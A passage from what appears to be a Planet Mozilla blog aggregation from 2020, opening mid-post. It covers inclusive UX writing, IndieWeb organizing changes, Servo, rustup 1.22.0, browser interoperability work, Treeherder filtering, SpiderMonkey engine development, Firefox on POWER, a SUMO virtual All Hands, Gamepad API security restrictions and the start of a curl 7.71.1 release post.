Moving beyond anti-racist language

“We need to focus on who we are doing this for. We worry what we look like and that we’re doing the right thing. And that’s not the priority. The goal is to dismantle harmful systems. It’s important for white people to get away from your own feelings of wanting to look good. And focus on who you are doing it for and making it a better world for those people.” — Michael Metts

Beyond the language that appears in our products, Michael encouraged the group to educate themselves, follow Black writers and designers, and be open and willing to change. Any effective UX practitioner needs to approach their work with a sense of humility and openness to being wrong.

Supporting racial justice and the Black Lives Matter movement must also include raising long-needed conversations in the workplace, asking tough questions, and sitting with discomfort. Michael recommended reading How To Be An Antiracist by Ibram X. Kendi and So You Want to Talk About Race by Ijeoma Oluo.

Re-examining and revisiting norms in design systems

“In design systems, those who document and write are the ones who are codifying information for long term. It’s how terms like whitelist and blacklist, and master/slave keep showing up, decade after decade, in our stuff. We have a responsibility not to be complicit in codifying and continuing racist systems.” — Andy Welfle

Part of our jobs as UX practitioners is to codify and frame decisions. Design systems, for example, document content standards and design patterns. Andy reminded us that our own biases and assumptions can be built into these systems. Not questioning the systems we build and contribute to can perpetuate injustice.

It’s important to keep revisiting our own systems and asking questions about them. Why did we frame it this way? Could we frame it in another way?

Driving towards clarity early on in the design process

“It’s hard to write about something without understanding it. While you need clarity if you want to do your job well, your team and your users will benefit from it, too.” — Writing is Designing

Helping teams align and get clear on goals and user problems is a big part of a product writer’s job. While writers are often the ones to ask these clarifying questions, every member of the design team can and should participate in this clarification work—it’s the deep strategy work we must do before we can write and visualize the surface manifestation in products.

Before you open your favorite design tool (be it Sketch, Figma, or Adobe XD) Andy and Michael recommend writers and visual designers start with the simplest tool of all: a text editor. There you can do the foundational design work of figuring out what you’re trying to accomplish.

The longevity of good content

A book club member asked, “How long does good content last?” Andy’s response: “As long as it needs to.”

Software work is never ‘done.’ Products and the technology that supports them continue to evolve. With that in mind, there are key touch points to revisit copy. For example, when a piece of desktop software becomes available on a different platform like tablet or mobile, it’s a good time to revisit your content (and entire experience, in fact) to see if it still works.

Final thoughts—an ‘everything first’ approach

In the grand scheme of tech things, UX writing is still a relatively new discipline. Books like Writing is Designing are helping to define and shape the practice.

When asked (at another meet-up, not our own) if he’s advocating for a ‘content-first approach,’ Michael’s response was that we need an ‘everything first approach’ — meaning, all parties involved in the design and development of a product should come to the planning table together, early on in the process. By making the case for writing as a strategic design practice, this book helps solidify a spot at that table for UX writers.

Prior texts read by Mozilla’s UX book club

Tantek ÇelikChanges To IndieWeb Organizing, Brief Words At IndieWebCamp West

A week ago Saturday morning co-organizer Chris Aldrich opened IndieWebCamp West and introduced the keynote speakers. After their inspiring talks he asked me to say a few words about changes we’re making in the IndieWeb community around organizing. This is an edited version of those words, rewritten for clarity and context. — Tantek

Chris mentioned that one of his favorite parts of our code of conduct is that we prioritize marginalized people’s safety above privileged folks’ comfort.

That was a change we deliberately made last year, announced at last year’s summit. It was well received, but it’s only one minor change.

Those of us that have organized and have been organizing our all-volunteer IndieWebCamps and other IndieWeb events have been thinking a lot about the events of the past few months, especially in the United States. We met the day before IndieWebCamp West and discussed our roles in the IndieWeb community and what we can do to examine the structural barriers and systemic racism and/or sexism that exist even in our own community. We have been asking, what can we do to explicitly dismantle those?

We have done a bunch of things. Rather, we as a community have improved things organically, in a distributed way, sharing with each other, rather than any explicit top-down directives. Some improvements are smaller, such as renaming things like whitelist & blacklist to allowlist & blocklist (though we had documented blocklist since 2016, allowlist since this past January, and only added whitelist/blacklist as redirects afterwards).

Many of these changes have been part of larger quieter waves already happening in the technology and specifically open source and standards communities for quite some time. Waves of changes that are now much more glaringly obviously important to many more people than before. Choosing and changing terms to reinforce our intentions, not legacy systemic white supremacy.

Part of our role & responsibility as organizers (as anyone who has any power or authority, implied or explicit, in any organization or community), is to work to dismantle any aspect or institution or anything that contributes to white supremacy or to patriarchy, even in our own volunteer-based community.

We’re not going to get everything right. We’re going to make mistakes. An important part of the process is acknowledging when that happens, making corrections, and moving forward; keep listening and keep learning.

The most recent change we’ve made has to do with Organizers Meetups that we have been doing for several years, usually a half day logistics & community issues meeting the day before an IndieWebCamp. Or Organizers Summits a half day before our annual IndieWeb Summits; in 2019 that’s when we made that aforementioned update to our Code of Conduct to prioritize marginalized people’s safety.

Typically we have asked people to have some experience with organizing in order to participate in organizers meetups. Since the community actively helps anyone who wants to put in the work to become an organizer, and provides instructions, guidelines, and tips for successfully doing so, this seemed like a reasonable requirement. It also kept organizers meetups very focused on both pragmatic logistics, and dedicated time for continuous community improvement, learning from other events and our own IndieWebCamps, and improving future IndieWebCamps accordingly.

However, we must acknowledge that our community, like a lot of online, open communities, volunteer communities, unfortunately reflects a very privileged demographic. If you look at the photos from Homebrew Website Clubs, they’re mostly white individuals, mostly male, mostly apparently cis. Mostly white cis males. This does not represent the users of the Web. For that matter, it does not represent the demographics of the society we're in.

One of our ideals, I believe, is to better reflect in the IndieWeb community, both the demographic of everyone that uses the Web, and ideally, everyone in society. While we don't expect to solve all the problems of the Web (or society) by ourselves, we believe we can take steps towards dismantling white supremacy and patriarchy where we encounter them.

One step we are taking, effective immediately, is making all of our organizers meetups forward-looking for those who want to organize a Homebrew Website Club or IndieWebCamp. We still suggest people have experience organizing. We also explicitly recognize that any kind of requirement of experience may serve to reinforce existing systemic biases that we have no interest in reinforcing.

We have updated our Organizers page with a new statement of who should participate, our recognition of broader systemic inequalities, and an explicit:

… welcome to Organizers Meetups all individuals who identify as BIPOC, non-male, non-cis, or any marginalized identity, independent of any organizing experience.

This is one step. As organizers, we’re all open to listening, learning, and doing more work. That's something that we encourage everyone to adopt. We think this is an important aspect of maintaining a healthy community and frankly, just being the positive force that we want the IndieWeb to be on the Web and hopefully for society as a whole.

If folks have questions, I or any other organizers are happy to answer them, either in chat or privately, however anyone feels comfortable discussing these changes.

Thanks. — Tantek

Karl DubostJust Write A Blog Post

This post will be very short. That's the goal. And this is addressed to the Mozilla community at large (be they employees or contributors).

  1. Create a blog
  2. Ask to be added to Planet Mozilla
  3. Write small, simple short things

And that's all.

The more you write, the easier it will become.

Write short form, long form will come later. Just by itself. Without you noticing it.

Want good examples?

Notes:

  1. Wordpress. Tumblr. SquareSpace. Ghost. Medium. Qiita. Or host your own with your own domain name: Gandi. DigitalOcean. It doesn't have to be beautiful. It needs to have content.
  2. For Example, how I asked to add mine.
  3. What are you working on? What do you think the Web should be? What would this small feature do? Have an idea? Wondering about something? Instead of sending an email to one individual or an internal group chat or a private mailing list, just write a blog post and then send an email with a link to the blog post asking for feedback.

Otsukare!

The Servo BlogThis Week In Servo 131

Welcome back everyone - it’s been a year without written updates, but we’re getting this train back on track! Servo hasn’t been dormant in that time; the biggest news was the public release of Firefox Reality (built on Servo technology) in the Microsoft store.

In the past week, we merged 44 PRs in the Servo organization’s repositories.

The latest nightly builds for common platforms are available at download.servo.org.

Planning and Status

Our roadmap is available online, including the team’s plans for 2020.

This week’s status updates are here.

Exciting works in progress

Notable Additions

  • SimonSapin fixed a source of Undefined Behaviour in the smallvec crate.
  • muodov improved the compatibility of invalid form elements with the HTML specification, and added the missing requestSubmit API.
  • kunalmohan implemented GPUQueue APIs for WebGPU, avoided synchronous updates, and implemented the getMappedRange API for GPUBuffer.
  • alaryso fixed a bug preventing running tests when using rust-analyzer.
  • alaryso avoided a panic in pages that perform layout queries on disconnected iframes.
  • paulrouget integrated virtual keyboard support for text inputs into Firefox Reality, as well as added support for keyboard events.
  • Manishearth implemented WebAudio node types for reading and writing MediaStreams.
  • gterzian improved the responsiveness of the browser when shutting down.
  • utsavoza updated the referrer policy implementation to match the updated specification.
  • ferjm implemented support for WebRTC data channels.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

The Rust Programming Language BlogAnnouncing Rustup 1.22.0

The rustup working group is happy to announce the release of rustup version 1.22.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.22.0 is as easy as closing your IDE and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.22.0

This release is mostly related to internal rework and tweaks in UI messages. It is effectively a quality-of-life update which includes things such as:

  • Supporting the larger MIPS release files which now exceed 100MB in individual files
  • Supporting running in a lower-memory mode on single-CPU systems, along with detecting any in-place soft-limits on memory consumption in an effort to reduce the chance you run out of RAM during an install on systems like Raspberry Pis
  • When we skip a nightly for missing-component reasons we now tell you all the missing components
  • We now tell you where overrides are coming from in rustup show
  • Added riscv64gc-unknown-linux-gnu version of rustup
  • You can now specify multiple components when installing a toolchain more easily. For example, if you wanted to install nightly with the default profile, but add the IDE support all in one go, you can now run
    rustup toolchain install --profile default --component rls,rust-analysis,rust-src nightly
    

There are many more changes in 1.22.0, with around 90 PRs, though a large number of them are internal changes which you can look at on GitHub if you want, and you can see a little more detail than the above in our changelog.

Thanks

Thanks to all the contributors who made rustup 1.22.0 possible!

  • Alejandro Martinez Ruiz
  • Alexander D'hoore
  • Ben Chen
  • Chris Denton
  • Daniel Silverstone
  • Evan Weiler
  • Guillaume Gomez
  • Harry Sarson
  • Jacob Lifshay
  • James Yang
  • Joel Parker Henderson
  • John Titor
  • Jonas Platte
  • Josh Stone
  • Jubilee
  • Kellda
  • LeSeulArtichaut
  • Linus Färnstrand
  • LitoMore
  • LIU An (劉安)
  • Luciano Bestia
  • Lzu Tao
  • Manish Goregaokar
  • Mingye Wang
  • Montgomery Edwards
  • Per Lundberg
  • Pietro Albini
  • Robert Collins
  • Rudolf B.
  • Solomon Ucko
  • Stein Somers
  • Tetsuharu Ohzeki
  • Tom Eccles
  • Trevor Arjeski
  • Tshepang Lekhonkhobe

Frédéric WangContributions to Web Platform Interoperability (First Half of 2020)

Note: This blog post was co-authored by AMP and Igalia teams.

Web developers continue to face challenges with web interoperability issues and a lack of implementation of important features. As an open-source project, the AMP Project can help represent developers and aid in addressing these challenges. In the last few years, we have partnered with Igalia to collaborate on helping advance predictability and interoperability among browsers. Reaching the level of standardization and interoperability that we want can be a long process. New features frequently require experimentation to get things rolling and course corrections along the way; then, ultimately, as more implementations and users begin exploring the space, doing really interesting things and finding issues at the edges, we continue to advance interoperability.

Both AMP and Igalia are very pleased to have been able to play important roles at all stages of this process and help drive things forward. During the first half of this year, here’s what we’ve been up to…

Default Aspect Ratio of Images

In our previous blog post we mentioned our experiment to implement the intrinsic size attribute in WebKit. Although this was a useful prototype for standardization discussions, at the end there was a consensus to switch to an alternative approach. This new approach addresses the same use case without the need for a new attribute. The idea is pretty simple: use the specified width and height attributes of an image to determine the default aspect ratio. If additional CSS is used, e.g. “width: 100%; height: auto;”, browsers can then compute the final size of the image without waiting for it to be downloaded. This avoids any relayout that could cause a bad user experience. This was implemented in Firefox and Chromium and we did the same in WebKit. We implemented this under a flag which is currently on by default in Safari Tech Preview and the latest iOS 14 beta.
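As a rough illustration of the approach (the image URL and dimensions below are placeholders), declaring the intrinsic dimensions alongside responsive CSS lets the browser reserve space using the implied ratio before any image bytes arrive:

// Minimal sketch: the width/height attributes give the browser a 4:3 default
// aspect ratio, so the final layout can be computed before 'photo.jpg' downloads.
const img = document.createElement('img');
img.src = 'photo.jpg';              // placeholder URL
img.setAttribute('width', '400');
img.setAttribute('height', '300');
img.style.width = '100%';           // responsive sizing...
img.style.height = 'auto';          // ...final height derived from the ratio
document.body.appendChild(img);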

Scrolling

We continued our efforts to enhance scroll features. In WebKit, we began with scroll-behavior, which provides the ability to do smooth scrolling. Based on our previous patch, it has landed and is guarded by an experimental flag “CSSOM View Smooth Scrolling” which is disabled by default. Smooth scrolling currently has a generic platform-independent implementation controlled by a timer in the web process, and we continue working on a more efficient alternative relying on the native iOS UI interfaces to perform scrolling.
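For context, this is the kind of smooth scrolling the feature enables, shown here as a small usage sketch:

// Programmatic smooth scroll using the CSSOM View options dictionary.
window.scrollTo({ top: 0, behavior: 'smooth' });

// The same behavior can be requested declaratively with CSS:
//   html { scroll-behavior: smooth; }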

We have also started to work on overscroll and overscroll customization, especially for the scrollend event. The scrollend event, as you might expect, is fired when the scroll is finished, but it lacked interoperability and required some additional tests. We added web platform tests for programmatic scroll and user scroll including scrollbar, dragging selection and keyboard scrolling. With these in place, we are now working on a patch in WebKit which supports scrollend for programmatic scroll and Mac user scroll.
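A hypothetical usage sketch of the scrollend event follows; since the event was still being specified and tested at the time, both the feature detection and the '.scroller' selector are assumptions:

// Sketch: react once scrolling has finished, if the event is available.
const scroller = document.querySelector('.scroller'); // placeholder selector
if ('onscrollend' in document) {
  scroller.addEventListener('scrollend', () => {
    console.log('scroll finished at offset', scroller.scrollTop);
  });
}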

On the Chrome side, we continue working on the standard scroll values in non-default writing modes. This is an interesting set of challenges surrounding the scroll API and how it works with writing modes which was previously not entirely interoperable or well defined. Gaining interoperability requires changes, and we have to be sure that those changes are safe. Our current changes are implemented and guarded by a runtime flag “CSSOM View Scroll Coordinates”. With the help of Google engineers, we are trying to collect user data to decide whether it is safe to enable it by default.

Another minor interoperability fix that we were involved in was to ensure that the scrolling attribute of frames recognizes values “noscroll” or “off”. That was already the case in Firefox and this is now the case in Chromium and WebKit too.

Intersection and Resize Observers

As mentioned in our previous blog post, we drove the implementation of IntersectionObserver (enabled in iOS 12.2) and ResizeObserver (enabled in iOS 14 beta) in WebKit. We have made a few enhancements to these useful developer APIs this year.

Users reported difficulties observing the root of an inner iframe, and the specification was modified to accept an explicit document as a root parameter. This was implemented in Chromium and we implemented the same change in WebKit and Firefox. It is currently available in Safari Tech Preview, iOS 14 beta and Firefox 75.
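A short sketch of the explicit-document form (the iframe selector and the '#ad' id are placeholders):

// Sketch: observe an element inside a same-origin iframe, using that iframe's
// document as the observer root.
const frame = document.querySelector('iframe');
const observer = new IntersectionObserver(entries => {
  for (const entry of entries) {
    console.log(entry.target.id, 'intersecting:', entry.isIntersecting);
  }
}, { root: frame.contentDocument, threshold: 0.5 });
observer.observe(frame.contentDocument.querySelector('#ad'));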

A bug was also reported with ResizeObserver incorrectly computing size for non-default zoom levels, which in particular was causing a bug on Twitter feeds. We landed a patch last April and the fix is available in the latest Safari Tech Preview and iOS 14 beta.

Resource Loading

Another thing that we have been concerned with is how we can give more control and power to authors to more effectively tell the browser how to manage the loading of resources and improve performance.

The work that we started in 2019 on lazy loading has matured a lot along with the specification.

The lazy image loading implementation in WebKit therefore passes the related WPT tests and is functional and comparable to the Firefox and Chrome implementations. However, as you might expect, as we compare uses and implementation notes it becomes apparent that determining the moment when the lazy image load should start is not defined well enough. Before this can be enabled in releases some more work has to be done on improving that. The related frame lazy loading work has not started yet since the specification is not in place.
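For reference, this is roughly how a page opts an image into lazy loading, with a simple capability check (the image URL is a placeholder):

// Sketch: request lazy loading where supported; otherwise the image simply
// loads eagerly as before.
const img = document.createElement('img');
if ('loading' in HTMLImageElement.prototype) {
  img.loading = 'lazy';
}
img.src = 'gallery/photo-42.jpg'; // placeholder URL
document.body.appendChild(img);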

We also added an implementation for stale-while-revalidate. The stale-while-revalidate Cache-Control directive allows a grace period in which the browser is permitted to serve a stale asset while the browser is checking for a newer version. This is useful for non-critical resources where some degree of staleness is acceptable, like fonts. The feature has been enabled recently in WebKit trunk, but it is still disabled in the latest iOS 14 beta.
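As an illustration (the values are arbitrary), a font served with the header below may be used from cache for ten minutes, and for a further day a stale copy may be served while the browser revalidates in the background:

Cache-Control: max-age=600, stale-while-revalidate=86400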

Contributions were made to improve prefetching in WebKit, taking into account its cache partitioning mechanism. Before this work can be enabled, some more patches have to land and some parts (for example, prenavigate) possibly need to be specified in more detail. Finally, various general Fetch improvements have been made, improving the fetch WPT score.

What’s next

There is still a lot to do in scrolling and resource loading improvements and we will continue to focus on the features mentioned such as scrollend event, overscroll behavior and scroll behavior, lazy loading, stale-while-revalidate and prefetching.

As a continuation of the work done for aspect ratio calculation of images, we will consider the more general CSS aspect-ratio property. Performance metrics such as the ones provided by the Web Vitals project are also critical for web developers to ensure that their websites provide a good user experience, and we are willing to investigate support for these in Safari.

We love doing this work to improve the platform and we’re happy to be able to collaborate in ways that contribute to bettering the web commons for all of us.

Armen ZambranoIn Filter Treeherder jobs by test or manifest path I describe the feature.

In Filter Treeherder jobs by test or manifest path I describe the feature. In this post I will explain how it came about.

I want to highlight the process between a conversation and a deployed feature. Many times, it is an unseen part of the development process that can be useful for contributors and junior developers who are trying to grow as developers.

Back in the Fall of 2019 I started inquiring into developers’ satisfaction with Treeherder. This is one of the reasons I used to go to the office once in a while. One of these casual face-to-face conversations led to this feature. Mike Conley explained to me how he would look through various logs to find a test path that had failed on another platform (see referenced post for further details).

After I understood the idea, I tried to determine what options we had to implement it. I wrote a Google Doc with various alternative implementations and with information about what pieces were needed for a prototype. I requested feedback from various co-workers to help discover blind spots in my plans.

Once I had some feedback from immediate co-workers, I made my idea available in a Google group (increasing the circle of people giving feedback). I described my intent to implement the idea and was curious to see if anyone else was already working on it or had better ideas on how to implement it. I did this to raise awareness in larger circles, reduce duplicate efforts and learn from prior work.

I also filed a bug to drive further technical discussions and for interested parties to follow up on the work. Fortunately, around the same time Andrew Halberstadt started working on defining explicitly what manifests each task executes before the tasks are scheduled (see bug). This is a major component to make the whole feature on Treeherder functional. In some cases, talking enough about the need can enlist others from their domains of expertise to help with your project.

At the end of 2019 I had time to work on it. After navigating endlessly through Treeherder’s code for a few days, I decided that I wanted to see a working prototype. This would validate its value and determine if all the technical issues had been ironed out. In a couple of days I had a working prototype. Most of the code could be copy/pasted into Treeherder once I found the correct module to make changes in.

Finally, in January the feature landed. There were some small bugs and other follow up enhancements later on.

Stumbling upon this feature was great because in H1 we started looking at changing our CI’s scheduling to use manifests for scheduling instead of tasks, and this feature lines up well with it.

Armen ZambranoFilter Treeherder jobs by test or manifest path

At the beginning of this year we landed a new feature on Treeherder. This feature helps our users to filter jobs using test paths or manifest paths.

This feature is useful for developers and code sheriffs because it permits them to determine whether or not a test that fails in one platform configuration also fails in other ones. Previously, this was difficult because certain test suites are split into multiple tasks (aka “chunks”). In the screenshot below, you can see that the manifest path devtools/client/framework/browser-toolbox/test/browser.ini is executed in different chunks.

<figcaption>Showing tasks that executed a specific manifest path</figcaption>

NOTE: A manifest is a file that defines various test files, thus, a manifest path defines a group of test paths. Both types of paths can be used to filter jobs.

This filtering method has been integrated to the existing feature, “Filter by a job field” (the funnel icon). See below what the UI looks like:

<figcaption>Filter by test path</figcaption>

If you’re curious about the work you can visit the PR.

There’s a lot more coming around this realm as we move toward manifest-based scheduling in the Firefox CI instead of task-based scheduling. Stay tuned! Until then keep calm and filter away.

Spidermonkey Development BlogSpiderMonkey Newsletter 5 (Firefox 78-79)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 78 and 79 Nightly release cycles.

If you like these newsletters, you may also enjoy Yulia’s weekly Compiler Compiler live stream, a guided tour of what it is like to work on SpiderMonkey and improve spec compliance.

JavaScript

🎁 New features

Firefox 78
Firefox 79

👷🏽‍♀️ Feature work

⏩ Regular Expression engine update

  • Iain fixed the last blockers and enabled the new engine by default.
  • Iain then implemented support for named capture groups and added a fuzzing target for differential testing of interpreted vs compiled code with libfuzzer.
  • Finally, Iain removed the old engine in Firefox 79 and tidied up the code.

    See the Mozilla Hacks blog post for more details.

🗑️ Garbage Collection

  • Steve enabled incremental WeakMap marking, a big change to help reduce GC pauses.
  • Steve landed changes to de-duplicate strings during nursery GC, based on work done by GC intern Krystal Yang and then rebased by Thinker Li.
  • Jon added a header to nursery-allocated cells and used this to simplify code.
  • Steve created a GC micro-benchmark suite that can be used to compare GC performance on various workloads in different engines / browsers.
  • Jon fixed various issues with GC telemetry data.
  • Jon optimized incremental sweeping by no longer collecting the nursery for every slice.
  • Steve optimized string allocation by allocating a tenured string directly for certain call sites.
  • Yoshi fixed sending telemetry data of promotion rate when nursery was empty.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve performance, simplify a lot of code and improve bytecode caching. It also makes it possible to rewrite our frontend in Rust (see SmooshMonkey item below).

  • Caroline merged LazyScriptCreationData into FunctionCreationData.
  • Ted moved the script atoms from RuntimeScriptData to PrivateScriptData. This allowed merging various classes into ScriptStencil.
  • Ted added snapshotting for incoming scope data to better isolate the parser from the VM.
  • Ted deferred allocation of functions and scripts to the end of bytecode generation, moving us closer to not doing GC-allocations in the frontend.
  • Kannan factored non-GC state out of scope data and changed BindingIter to work with both GC atoms (JSAtom) and the future ParserAtom type.
  • Kannan landed the ParserAtom and ParserAtomsTable types. The next part is converting the frontend to use ParserAtom instead of JSAtom, another big step towards GC-free parsing.

🐒 SmooshMonkey

SmooshMonkey is our project to reimplement the frontend in a safe language (Rust) and make it easier to implement new features and improve long-term maintainability of the code base.

  • Arai is implementing function compilation, while updating the Stencil interface for function.
  • Arai landed a tool and automation to improve the development workflow.
  • Arai bumped the supported Unicode version to 13.
  • Yulia is working on separating the error checking phase from the AST building phase. This will allow running the error checking phase without building an AST, for validating JavaScript files when they are received, and also building an AST without doing the validation, which would speed up the first execution of scripts, which are compiled on-demand.
  • Nicolas is rebasing the performance work implemented in a fork, in order to bring it to the main development tree of SmooshMonkey.

🚀 WarpBuilder

WarpBuilder is the JIT project to replace the frontend of our optimizing JIT (IonBuilder) and the engine’s Type Inference mechanism with a new MIR builder based on compiling CacheIR to MIR. WarpBuilder will let us improve security, performance, memory usage and maintainability of the whole engine.

Since the last newsletter we’ve implemented a lot more CacheIR instructions in the transpiler (the part of WarpBuilder responsible for translating CacheIR to MIR). Although we’re still missing a lot of pieces, we’re starting to get very encouraging performance numbers.

  • Tom, Caroline, and Jan added CacheIR and Warp support for many builtin functions (for example Math.floor and Array.isArray) and self-hosting intrinsics. These functions are now also properly optimized in the Baseline Interpreter and JIT.
  • Tom added support for property sets, double arithmetic, TypedArray elements, and many other things to the transpiler.
  • Jan added support for element sets, string concatenation and other things to the transpiler.
  • Caroline added a CacheIR health report mechanism. In the future this will make it easier to analyze performance of JIT code.
  • Jan improved MIR optimizations for slot/element loads followed by an unbox.
  • Christian started fuzzing WarpBuilder.

📈 Miscellaneous optimizations

  • André added JIT optimizations for BigInt64Array and BigUint64Array.
  • Denis replaced the ELEMENT_SLOT in ScriptSourceObject with a callback function.
  • Ted optimized Object.prototype.toString when called with a primitive value to not create a temporary object. This is pretty common on the web.
  • André added JIT optimizations for DataView methods.
  • Iain added a fast path to our JIT stubs for simple atom regular expressions.
  • Jan optimized post-barriers in JIT code.
  • Tom ported String.prototype.concat to self-hosted code so it can take advantage of JIT optimizations.
  • André added various optimizations for Math.pow and the **-operator.
  • Tom added MIR optimizations based on the type of certain objects.
  • Jan optimized the generated JIT code for unboxing Values.

🧹 Miscellaneous changes

  • Logan enabled async-stacks when devtools are open.
  • Jon removed the GCTrace framework (it wasn’t used and didn’t even compile).
  • Jason added support for using generators in self-hosted code, for implementing the Iterator Helpers proposal.
  • Chris added documentation for cross-compiling SpiderMonkey for ARM64.
  • Jon added a NestedIterator template and used it to clean up some iterator classes.
  • André added a helper method for more robust MIR type checks, using an allow list instead of a deny list.
  • Jan simplified new.target handling for eval frames.
  • Yoshi landed minor refactoring on SourceCompressionTask.

WebAssembly

🎁 New features

🧹 Other changes

  • Lars added SIMD support on x64 to the Baseline and Ion compilers (behind a flag).
  • Lars optimized various SIMD operations in the Ion backend.
  • Ryan fixed subclassing of certain WebAssembly objects.
  • Dmitry (from Igalia) started landing some changes to improve the call ABI.
  • Ryan optimized freezing of the exports object to fix a performance issue.
  • Benjamin, Julian, and Chris made Cranelift work on ARM64, thus providing us (soon!) with an optimizing wasm compiler for the platform.
  • Chris added support for multi-values to Cranelift on ARM64.

The Talospace ProjectFirefox 78 on POWER

Firefox 78 is released and is running on this Talos II. This version in particular features an updated RegExp engine but is most notable (notorious) for disabling TLS 1.0/1.1 by default (only 1.2/1.3). Unfortunately, because of craziness at $DAYJOB and the lack of a build waterfall or some sort of continuous integration for ppc64le, a build failure slipped through into release but fortunately only in the (optional) tests. The fix is trivial, another compilation bug in the profiler that periodically plagues unsupported platforms, and I have pushed it upstream in bug 1649653. You can either apply that bug to your tree or add ac_add_options --disable-tests to your .mozconfig. Speaking of, as usual, the .mozconfigs we use for debug and optimized builds have been stable since Firefox 67.

UPDATE: The patch has landed on release, beta and ESR 78, so you should be able to build straight from source.

Support.Mozilla.OrgLet’s meet online: Virtual All Hands 2020

Hi folks,

Here I am again sharing with you the amazing experience of another All Hands.

This time no traveling was involved, and every meeting, coffee, and chat were left online.

Virtuality seems the focus of this 2020, and if on the one hand we strongly missed the possibility of being together with colleagues and contributors, on the other hand we were grateful for the possibility of being able to connect.

Virtual All Hands has been running for a week, from the 15th of June to the 18th, and has been full of events and meetups.

As SUMO team we had three events running on Tuesday, Wednesday, and Thursday, along with the plenaries and Demos that were presented on Hubs. Floating in virtual reality space while experiencing and listening to new products and features that will be introduced in the second part of the year has been a super exciting experience and something really enjoyable.

Let’s talk about our schedule, shall we?

On Tuesday we ran our Community update meeting, in which we focused on what happened in the last 6 months, the projects that we successfully completed, and the ones that we have left for the next half of the year.

We talked a lot about the community plan, and which are the next steps we need to take to complete everything and release the new onboarding experience before the end of the year.

We did not forget to mention everything that happened to the platform. The new responsive redesign and the ask-a-question flow have greatly changed the face of the support forum, and everything was implemented while the team was working on a solution for the spam flow we have been experiencing in the last month.

If you want to read more about this, here are some forum posts we wrote in the last few weeks you can go through regarding these topics:

On Wednesday we focused on presenting the campaign for the Respond Tool. For those of you who don’t know what I am talking about, we shared some resources regarding the tool here. The campaign will run up until today, but we still need your input on many aspects, so join us on the tool!

The main points we went through during the meeting were:

  • Introduction about the tool and the announcement on the forum
  • Updates on Mozilla Firefox Browser
  • Update about the Respond Tool
  • Demo (how to reply, moderate, or use canned response) – Teachable course
  • Bugs. If you use the Respond Tool, please file bugs here
  • German and Spanish speakers needed: we have a high volume of reviews in Spanish and German that need your help!

On Thursday we took care of Conversocial, the new tool that replaces Buffer from now on. We already have some contributors joining us on the tool and we are really happy with everyone’s excitement in using the tool and finally having a full Twitter account dedicated to SUMO. @firefoxsupport is here: please go, share, and follow!

The agenda of the meeting was the following:

  • Introduction about the tool
  • Contributor roles
  • Escalation process
  • Demo on Conversocial
  • @FirefoxSupport overview

If you were invited to the All Hands or you have NDA access you can access the meetings at this link: https://onlinexperiences.com

Thank you for your participation and your enthusiasm as always, we are missing live interaction but we have the opportunity to use some great tools as well. We are happy that so many people could enjoy those opportunities and created such a nice environment during the few days of the All Hands.

See you really soon!

The SUMO Team

Hacks.Mozilla.OrgSecuring Gamepad API

Firefox release dates for Gamepad API updates

As part of Mozilla’s ongoing commitment to improve the privacy and security of the web platform, over the next few months we will be making some changes to how the Gamepad API works.

Here are the important dates to keep in mind:

  • 25th of August 2020 (Firefox 81 Beta/Developer Edition): the .getGamepads() method will only return gamepads if called in a “secure context” (e.g., https://).
  • 22nd of September 2020 (Firefox 82 Beta/Developer Edition): switch to requiring a permission policy for third-party contexts/iframes.

We are collaborating on making these changes with folks from the Chrome team and other browser vendors. We will update this post with links to their announcements as they become available.

Restricting gamepads to secure contexts

Starting with Firefox 81, the Gamepad API will be restricted to what are known as “secure contexts” (bug 1591329). Basically, this means that the Gamepad API will only work on sites served over “https://”.

For the next few months, we will show a developer console warning whenever the .getGamepads() method is called from an insecure context.

From Firefox 81, we plan to require a secure context for .getGamepads() by default. To avoid significant code breakage, calling .getGamepads() from an insecure context will return an empty array. We will display this console warning indefinitely:

Firefox developer console

The developer console now shows a warning when the .getGamepads() method is called from insecure contexts
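If you want to prepare your code for this change, a defensive pattern along these lines may help (a sketch, not an official recommendation):

// Sketch: getGamepads() returns an empty array on insecure pages once the
// restriction ships, so guard against "no gamepads" rather than assuming one.
window.addEventListener('gamepadconnected', () => {
  if (!window.isSecureContext) {
    console.warn('Gamepad API requires a secure (https) context in newer Firefox versions');
  }
  const pads = navigator.getGamepads().filter(Boolean); // skip empty slots
  for (const pad of pads) {
    console.log(`${pad.id}: ${pad.buttons.length} buttons, ${pad.axes.length} axes`);
  }
});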

Permission Policy integration

From Firefox 82, third-party contexts (i.e., <iframe>s that are not same origin) that require access to the Gamepad API will have to be explicitly granted access by the hosting website via a Permissions Policy.

In order for a third-party context to be able to use the Gamepad API, you will need to add an “allow” attribute to your HTML like so:

  <iframe allow="gamepad" src="https://example.com/">
  </iframe>

Once this ships, calling .getGamepads() from a disallowed third-party context will throw a JavaScript security error.
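If your code may run in embedded contexts you do not control, it may be worth wrapping the call defensively; this is a sketch, and the exact error type thrown is an assumption:

// Sketch: inside a cross-origin <iframe> without allow="gamepad",
// keep a future security error from breaking unrelated code.
let pads = [];
try {
  pads = navigator.getGamepads();
} catch (e) {
  console.warn('Gamepad access blocked by permissions policy:', e.name);
}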

You can track our implementation progress in bug 1640086.

WebVR/WebXR

As WebVR and WebXR already require a secure context to work, these changes shouldn’t affect any sites relying on .getGamepads(). In fact, everything should continue to work as it does today.

Future improvements to privacy and security

When we ship APIs we often find that sites use them in unintended ways – mostly creatively, sometimes maliciously. As new privacy and security capabilities are added to the web platform, we retrofit those solutions to better protect users from malicious sites and third-party trackers.

Adding “secure contexts” and “permission policy” to the Gamepad API is part of this ongoing effort to improve the overall privacy and security of the web. Although we know these changes can be a short-term inconvenience to developers, we believe it’s important to constantly evolve the web to be as secure and privacy-preserving as it can be for all users.

The post Securing Gamepad API appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl 7.71.1 – try again

This is a follow-up patch release a mere week after the grand 7.71.0 release. While we introduced a few minor regressions in that release, one of them was significant enough to make us decide to fix and ship an update sooner rather than later. I’ll elaborate below.

